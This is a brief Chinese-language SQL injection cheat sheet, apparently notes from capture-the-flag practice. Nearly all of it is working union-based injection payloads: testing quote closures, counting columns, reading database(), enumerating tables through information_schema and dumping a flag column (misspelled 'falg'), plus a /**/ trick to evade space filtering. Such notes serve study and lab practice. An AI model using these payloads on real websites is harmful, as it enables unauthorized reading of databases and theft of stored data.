SQL注入总结
0x00 前言
简单的总结一下SQL注入的内容
0x01 常规注入
通过特殊字符测试闭合,通常使用的闭合方式有' " ') ")
等
1.判断字段
a' union select 1,2,3 #
2.执行基础内容
a' union select 1,database(),3 #
3.查表
a' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#
4.查看具体数据
a' union select 1,falg,3 from web2.flag#
0x02 绕过
1.空格绕过
空格可以通过/**/
进行绕过